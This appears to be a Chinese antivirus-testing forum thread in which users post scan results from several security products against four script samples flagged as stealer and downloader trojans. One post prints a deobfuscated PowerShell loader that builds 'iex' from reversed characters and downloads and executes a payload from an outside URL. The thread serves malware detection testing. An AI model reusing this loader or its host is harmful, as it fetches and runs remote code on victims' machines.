x4 (2024-01-18)

petr0vic

UNknownOoo

火绒
扫描：1X

1. 扫描文件：4
   
2. 发现风险：1
   
3. 已处理风险：0
   
4. 病毒详情：
   
5. 风险路径：C:\Users\UnknownOoo\Downloads\Compressed\4\4.js, 病毒名：TrojanDownloader/JS.Agent.ea, 病毒ID：81a67eb0c32ef748, 处理结果：暂不处理

复制代码

X-Sec
扫描：云黑 1X

1. ---------------------
   
2. 2024/01/18 17:52:41 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\4\2.vbs -- [rame-cloud] Stealer.Agent/VBS!8.14FBA

复制代码

tony099

卡巴KTS 21.15扫描--2.vbs   HEUR:Trojan-PSW.VBS.Stealer.gen

1.js 3.bat 4.js   KSN未知

123456aaaafsdeg

1. 360 Total Security扫描日志
   
2. 
   
3. 扫描时间：2024-01-18 17:55:01
   
4. 扫描用时：00:00:03
   
5. 扫描项目总数：4
   
6. 威胁总数：2
   
7. 处理威胁数：2
   
8. 
   
9. 扫描选项
   
10. ----------------------
    
11. 扫描压缩包：否
    
12. 常规引擎设置：鲲鹏引擎
    
13. 
    
14. 扫描内容
    
15. ----------------------
    
16. C:\Users\Administrator\Desktop\新建文件夹\1.js
    
17. C:\Users\Administrator\Desktop\新建文件夹\2.vbs
    
18. C:\Users\Administrator\Desktop\新建文件夹\3.bat
    
19. C:\Users\Administrator\Desktop\新建文件夹\4.js
    
20. 
    
21. 扫描结果
    
22. ======================
    
23. 高风险项目
    
24. ----------------------
    
25. C:\Users\Administrator\Desktop\新建文件夹\2.vbs E762FAA083EAAF4F5915CD95D16440E7 C41D2FAB90FCAB1821D1344D4A35C4223BA8D77E 70,6,2,4,280,1,256, || 0_0_0  [QEX脚本查杀引擎][virus.vbs.qexvmc.1][隔离文件][已处理]
    
26. C:\Users\Administrator\Desktop\新建文件夹\4.js 2ED38A86AF89FB67CBCCCD09135EDEA2 FA935B38B6DB4E0C8AE3A10CAEFAD447A935497C 70,6,2,4,280,1,256, || 0_3_0  [QEX脚本查杀引擎][virus.js.qexvmc.1065][隔离文件][已处理]
    

复制代码

Agu

WSCS - 掃描0X

DeepGuard攔截4.js

DisaPDB

Qihoo360 scan 2x.

Run 1.js

3.bat

4/4 in all.
AVG scan 1x.

Run 1x

2/4 in all.

1. $rt='x','e','I';[Array]::Reverse($rt);
   
2. sal z ($rt -join '');
   
3. $t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);
   
4. [System.Net.ServicePointManager]::SecurityProtocol = $t56fg;
   
5. $tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')';
   
6. z($tpg -join '');
   
7. do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
   
8. $tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';
   
9. $tty=z($tty55 -join '');
   
10. $rot='Down','load','Str','ing';
    
11. $rotJ=($rot -join '');
    
12. $bnt='https','://pizzamadre.com.ar/M13C.jpg';
    
13. $bntJ=($bnt -join '');
    
14. $mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);
    
15. z($mv)
    

复制代码

LSPLDD

卡巴2X
2.vbs
HEUR:Trojan-PSW.VBS.Stealer.gen
4.js
HEUR:Trojan-Downloader.Script.Generic
无反应:
1.js
3.bat

BD3X
3.bat
Dropped:Trojan.BAT.Agent.TT
2.vbs
Gen:Suspicious.Cloud.12.0039A21E840000
4.js
Gen:Suspicious.Cloud.12.00081D7BF30000
无反应:
1.js

hhhq316

安天 2

Nocria

IKARUS - 2/4



To IKARUS.

​
Dear Ladies and Gentlemen,
Sehr geehrte Damen und Herren,

Many thanks for the delivered file.

***** virus / malware *****

This is a malicious file (virus/trojan/malware). Please remove the malicious file in the quarantine with the "Purge System" button. If the removal task fails please contact IKARUS Support (support@ikarus.at).

This is an automatic generated e-mail, please do not reply.


Vielen Dank für die von Ihnen eingesandte Datei.

***** Virus / Malware *****

Bei dieser Datei handelt es sich um Schadcode (Virus/Trojaner/Malware). Versuchen Sie den Virus in der Quarantäne mit dem Button "Bereinigen"
zu entfernen. Sollte die Bereinigung nicht gelingen wenden Sie sich bitte an an den IKARUS Support (support@ikarus.at).

Dies ist eine automatisch generierte Nachricht, bitte antworten Sie nicht auf diese Nachricht.

Kind Regards,
Mit freundlichen Grüßen

----------------------------------
IKARUS Security Software GmbH
Analyse
Blechturmgasse 11, A-1050 Wien
----------------------------------

hhjjjjjj123

https://sandbox.dbappsecurity.co ... 0-b3f7-977d53f16e1f
VirusTotal - File - b13a9f954febd82e2351e16e6680794af0affe9d52180e2c27f31ce75f01c43c
VirusTotal - File - 0ab8b661e9ed38f5dc4e4b7f98da49c36a209138695dd9813ac8ed2910d4a5e3